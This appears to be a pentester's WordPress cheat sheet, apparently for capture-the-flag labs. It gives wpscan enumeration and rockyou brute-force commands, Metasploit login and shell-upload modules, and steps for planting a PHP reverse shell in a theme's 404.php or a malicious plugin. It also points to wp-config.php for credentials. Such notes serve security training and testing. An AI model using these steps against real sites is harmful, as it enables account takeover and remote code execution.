• Brute-force http://$IP/wp-admin, http://$IP/wp-login.php

    # Extract users, version
    wpscan --url http://$IP --enumerate
    # Brute-force creds (user: admin)
    wpscan --url http://$IP --wordlist rockyou.txt --username $USERS --max-threads 3
    # Ignore the SSL cert errordisable-tls-check
    wpscan -–url https://$IP disable-tls-check
  • Metasploit

    • brute-force: msf > use auxiliary/scanner/http/wordpress_login_enum

  • Check http://$IP/wp-content/themes, http://$IP/wp-content/uploads

  • Possible attack vectors:

    • After login, upload php reverse shell in 404.php of a theme (wp-content/themes/twentynineteen/404.php)

    • msf > use exploit/unix/webapp/wp_admin_shell_upload

    • Upload malicious plugins in zip

  • Check interesting files: /var/www/wp-config.php

  • Check plugins’ vulnerability

    • WordPress Plugin User Role Editor (https://www.exploit-db.com/exploits/44595): THM-Jack

Where uploads are stored

<base URL>/wp-content/uploads/<yyyy>/<mm>/<file name>


WordPress Enumeration

wpscan --url <url> -e vt,tt,u,ap -o wpscan.log

WordPress Bruteforcing

wpscan --url <url> --wordlist <wordlist> --username <username>

Navigate to:

Appearance (left-hand side) > Editor (left-hand side) > 404 Template (right-hand side)

Spawn Shell From WP Admin Access

Replace the PHP there with malicious shell spawning PHP (e.g. pentestmonkey php reverse shell script)

Browse to http://<site_name>/wp-content/themes/<theme_name>/404.php to trigger the payload

Last updated